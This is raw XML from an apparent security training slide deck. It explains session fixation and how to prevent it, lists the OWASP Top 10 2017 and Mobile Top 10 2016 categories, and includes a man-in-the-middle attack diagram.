          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Session fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1637" name="Session Fixation is an attack that permits an attacker to hijack a valid user session.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="10967702" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
            <a:r>
              <a:t>Session Fixation is an attack that permits an attacker to hijack a valid user session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
            <a:r>
              <a:t>the user’s session ID has been fixed in advance instead of having been generated randomly at login time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
            <a:r>
              <a:t>There are three widely used methods for maintaining sessions in web environment:URL arguments, hidden form fields and cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="381598" indent="-381598" defTabSz="749808">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3116"/>
            </a:pPr>
            <a:r>
              <a:t>if not all - known attacks against cookie-based session maintenance schemes can also be used against URL- or hidden form fields-based schemes, while the converse is not true. This makes cookies the best choice security-wise.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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0" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1641" name="Very often, session IDs are not only identification tokens, but also authenticators.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Very often, session IDs are not only identification tokens, but also authenticators. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>most cross-site scripting proof-of-concept exploits focus on obtaining the session ID stored in browser’s cookie storage. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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4" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1645" name="a good approach is to always regenerate the session identifier whenever the user's privilege level changes at all, including situations where the user must re-authenticate due to a timeout. By doing this, you can be sure that a session fixation vulnerability is not the weakest aspect of your access control mechanism."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>a good approach is to always regenerate the session identifier whenever the user's privilege level changes at all, including situations where the user must re-authenticate due to a timeout. By doing this, you can be sure that a session fixation vulnerability is not the weakest aspect of your access control mechanism.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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0" name="A1:2017 - Injection…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95409" y="1270000"/>
            <a:ext cx="7221635" cy="7213600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A1:2017 - Injection</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A2:2017 - Broken Authentication</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A3:2017 - Sensitive Data Exposure</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A4:2017 - XML External Entities (XXE)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A5:2017 - Broken Access Control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A6:2017 - Security Misconfiguration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A7:2017 - Cross-Site Scripting (XSS)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A8:2017 - Insecure Deserialization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A9:2017 - Using Components with Known Vulnerabilities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A10:2017 - Insufficient Logging &amp; Monitoring</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="M1: 2016 - Improper Platform Usage…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386110" y="1270000"/>
            <a:ext cx="5364712" cy="67127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M1: 2016 - Improper Platform Usage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M2: 2016 - Insecure Data Storage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M3: 2016 - Insecure Communication</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M4: 2016 - Insecure Authentication</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M5: 2016 - Insufficient Cryptography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M6: 2016 - Insecure Authorization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M7: 2016 - Client Code Quality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M8: 2016 - Code Tampering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M9: 2016 - Reverse Engineering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M10: 2016 - Extraneous Functionality </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149609" y="3335696"/>
            <a:ext cx="3250193" cy="729985"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FFFB00"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Spoofing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039220" y="1414953"/>
            <a:ext cx="19435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Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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8" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1649" name="A good generic recommendation for preventing session fixation attacks is to regenerate the session identifier anytime the user provides authentication information of any kind."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A good generic recommendation for preventing session fixation attacks is to regenerate the session identifier anytime the user provides authentication information of any kind. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165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2" name="Summary"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1653" name="Don’t put session IDs in the URL.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>Don’t put session IDs in the URL. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>Use SSL and secure cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>make sure your cookies have the secure and HttpOnly flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>tying sessions to IP addresses (though that can be spoofed) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>giving them short timeouts (though that runs against best practices for user experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>Session IDs are exposed in the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>Session IDs are vulnerable to session fixation attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on tokens, aren’t properly invalidated during logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358330" indent="-358330" defTabSz="694944">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:defRPr sz="3343"/>
            </a:pPr>
            <a:r>
              <a:t>Session IDs aren’t rotated after a successful login.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165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6" name="A3 : Sensitive Data Exposure"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A3 : Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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59" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="Man in the Middle attack is a common attack that is employed by the attackers to steal data."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="303030"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Man in the Middle attack is a common attack that is employed by the attackers to steal data. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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3" name="A4 : XML External Entities (XXE)"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A4 : XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166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66" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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8" name="A5 : Broken Access Control"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A5 : Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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71" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="A6 : Security Misconfiguration"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A6 : Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16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5" name="“Man in the Middle” (MitM) Attack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="756356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Man in the Middle” (MitM) Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="646" name="Server01" descr="Server01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9708444" y="4958079"/>
            <a:ext cx="1151468" cy="1354668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="User_UserHalfA01" descr="User_UserHalfA01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772355" y="4628444"/>
            <a:ext cx="934721" cy="1472072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397955" y="5080000"/>
            <a:ext cx="5996659" cy="5463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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="User"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903414" y="6179537"/>
            <a:ext cx="670345" cy="472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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="650" name="www.IBuySpy.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9141999" y="4461368"/>
            <a:ext cx="2194047" cy="472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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>www.IBuySpy.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3463430" y="5759591"/>
            <a:ext cx="5996659" cy="5463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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="656" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5335129" y="4831644"/>
            <a:ext cx="2192303" cy="2005980"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2192302" cy="2005979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="654" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2192303" cy="1587218"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2192302" cy="1587217"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="652" name="ThreatC01" descr="ThreatC01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="2192303" cy="1282418"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="653" name="User_UserHalfE01" descr="User_UserHalfE01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="548640" y="135466"/>
                <a:ext cx="923432" cy="1451752"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="655" name="Attacker"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="518898" y="1533031"/>
              <a:ext cx="1059679"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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="659" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3406986" y="5014524"/>
            <a:ext cx="1381761" cy="1225974"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1381760" cy="1225973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="657" name="Shape"/>
